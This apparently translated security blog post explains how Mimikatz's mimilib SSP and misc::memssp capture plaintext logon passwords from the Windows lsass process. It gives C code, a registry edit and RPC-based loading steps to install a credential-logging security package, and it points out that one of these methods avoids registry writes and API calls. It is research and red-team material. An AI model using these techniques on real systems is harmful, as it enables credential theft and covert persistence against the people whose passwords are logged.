0x00 Introduction

---

Both mimilib(ssp) in Mimikatz and misc::memssp share the same functionality as sekurlsa::wdigest, capable of extracting credentials from the lsass process, typically obtaining plaintext passwords of logged-in users (by default, this is not possible on Windows Server 2008 R2 and later systems). However, their implementation principles differ, so the methods to bypass restrictions on newer versions also vary.

I studied XPN's second article and gained new insights into this technique, so I attempted to summarize it and add some personal understanding.

XPN's blog:

https://blog.xpnsec.com/exploring-mimikatz-part-2/

0x01 Overview

---

This article will cover the following topics:

  • Introduction to SSP
  • How to Develop an SSP
  • How to Enumerate and Remove SSP
  • Three Methods to Add SSP
  • The Method of Modifying Memory with memssp

0x02 Introduction to SSP

---

References:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn751052(v=ws.11)

SSP, full name Security Support Provider, also known as Security Package

SSPI, full name Security Support Provider Interface, is the API used by Windows systems for authentication operations

Simply understood, SSPI is the API interface for SSP

SSP includes the following by default:

  • Kerberos Security Support Provider
  • NTLM Security Support Provider
  • Digest Security Support Provider
  • Schannel Security Support Provider
  • Negotiate Security Support Provider
  • Credential Security Support Provider
  • Negotiate Extensions Security Support Provider
  • PKU2U Security Support Provider

Users can develop and add SSPs themselves, which can operate on certain authentication and authorization events in the system.

This article only covers how to add an SSP to extract plaintext credentials from the lsass process.

0x03 How to Develop an SSP

---

An SSP is a DLL, with different functions corresponding to different export functions.

mimilib in mimikatz can not only serve as an SSP but also includes other functionalities.

The export function that implements credential extraction from the lsass process is SpLsaModeInitialize.

To extract this functionality, other export functions can be removed. The modified mimilib.def content is as follows:

LIBRARY
EXPORTS
SpLsaModeInitialize = kssp_SpLsaModeInitialize

Implementation code for mimilib extracting plaintext credentials from the lsass process:

https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kssp.c

The implementation code includes the following four functions:

  1. SpInitialize

Used to initialize SSP and provide a list of function pointers

  1. SpShutDown

Called to unload SSP

  1. SpGetInfo

Provides information about SSP, including version, name, and description

These details are displayed when enumerating SSP (the method will be introduced later)

  1. SpAcceptCredentials

Receives plaintext credentials passed by LSA, cached by SSP

mimilib here implements saving plaintext credentials to the file c:\windows\system32\kiwissp.log

0x04 How to Enumerate and Remove SSP

---

1. Enumerate SSP

Test code:

#define SECURITY_WIN32

#include
#include
#include
#pragma comment(lib,"Secur32.lib")

int main(int argc, char **argv) {
ULONG packageCount = 0;
PSecPkgInfoA packages;

if (EnumerateSecurityPackagesA(&packageCount, &packages) == SEC_E_OK) {
for (int i = 0; i < packageCount; i++) {
printf("Name: %s\nComment: %s\n\n", packages[i].Name, packages[i].Comment);
}
}
}

Note:

Code excerpt from XPN's article

The default result is as shown in the figure below

Alt text

2. Delete SSP

Test code:

#define SECURITY_WIN32

#include
#include
#include
#pragma comment(lib,"Secur32.lib")


int main(int argc, char **argv) {

SECURITY_STATUS SEC_ENTRYnRet = DeleteSecurityPackageA(argv[1]);
printf("DeleteSecurityPackageA return with 0x%X\n", SEC_ENTRYnRet);

}

After testing, it is not possible to delete any SSP; it always reports an error, indicating 0x80090302

After searching, an article with the same result was found:

http://cybernigma.blogspot.com/2014/03/using-sspap-lsass-proxy-to-mitigate.html

It is speculated that Microsoft has not opened this feature, meaning SSP cannot be deleted without restarting the system.

Supplement:

To unload a DLL from a process, the following code can be used:

An open-source project

0x05 Three Methods to Add SSP

---

Here, using mimilib.dll as an example

Method 1:

(1) Copy the file

Copy mimilib.dll to c:\windows\system32

For 64-bit systems, use the 64-bit mimilib.dll; for 32-bit systems, use the 32-bit mimilib.dll.

(2) Modify the registry

Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\

Set the value of Security Packages to mimilib.dll

(3) Wait for the system to restart

After the system restarts, generate the file kiwissp.log in c:\windows\system32, recording the plaintext password of the current user

Method 2: Using the API AddSecurityPackage

(1) Copy files

Same as Method 1

(2) Modify the registry

Same as Method 1

(3) Call AddSecurityPackage

Test code is as follows:

#define SECURITY_WIN32

#include
#include
#include
#pragma comment(lib,"Secur32.lib")


int main(int argc, char **argv) {
SECURITY_PACKAGE_OPTIONS option;
option.Size = sizeof(option);
option.Flags = 0;
option.Type = SECPKG_OPTIONS_TYPE_LSA;
option.SignatureSize = 0;
option.Signature = NULL;
SECURITY_STATUS SEC_ENTRYnRet = AddSecurityPackageA("mimilib", &option);
printf("AddSecurityPackage return with 0x%X\n", SEC_ENTRYnRet);
}

If successful, entering new credentials (e.g., runas, or after a user locks and re-logs into the screen) will generate the file kiwissp.log

Automated implementation of Method 2:

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/persistence/Install-SSP.ps1

Method 3: Using RPC to control lsass to load SSP

Open-source code by XPN:

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

I am using it under VS2015, the code needs to be slightly modified.

Test as shown in the figure below.

Alt text

Added successfully.

Note:

If the XPN open-source code is compiled to use MFC in a static library, the following code needs to be added: #pragma comment(lib, "Rpcrt4.lib")

If the XPN open-source code is not modified further, the called DLL needs to use an absolute path (the code in my screenshot has been modified, so it supports relative paths).

Returning Error code 0x6c6 returned, which is expected if DLL load returns FALSE indicates that the DLL loaded successfully.

This is an excellent method with the following advantages:

  • No need to write to the registry.
  • Does not call the API AddSecurityPackage.
  • No write operations to the memory of the lsass process are required.
  • The loaded DLL does not exist in the lsass process.

0x06 memssp method for modifying memory.

---

This is a feature in mimikatz, with the command as follows:

misc::memssp

By modifying the memory of the lsass process, credentials are extracted from the lsass process

After executing the command, if new credentials are entered (e.g., runas, or after a user locks the screen and logs back in), a file mimilsa.log will be generated in c:\windows\system32

XPN implemented the same functionality in the form of a DLL using mimikatz's code as a template, which can be loaded via RPC (method 3 in 0x05) or LoadLibrary

Code repository:

https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0

The code is applicable to WIN_BUILD_10_1703x64 and WIN_BUILD_10_1809x64

For other systems, corresponding variables need to be modified. Refer to the location:

https://github.com/gentilkiwi/mimikatz/blob/72b83acb297f50758b0ce1de33f722e70f476250/mimikatz/modules/kuhl_m_misc.c#L483

0x07 Summary

---

This article combines XPN's post to introduce methods for extracting credentials from the lsass process using Mimikatz's mimilib(ssp) and misc::memssp, compiling related techniques including development, addition, enumeration of SSP, and memory patching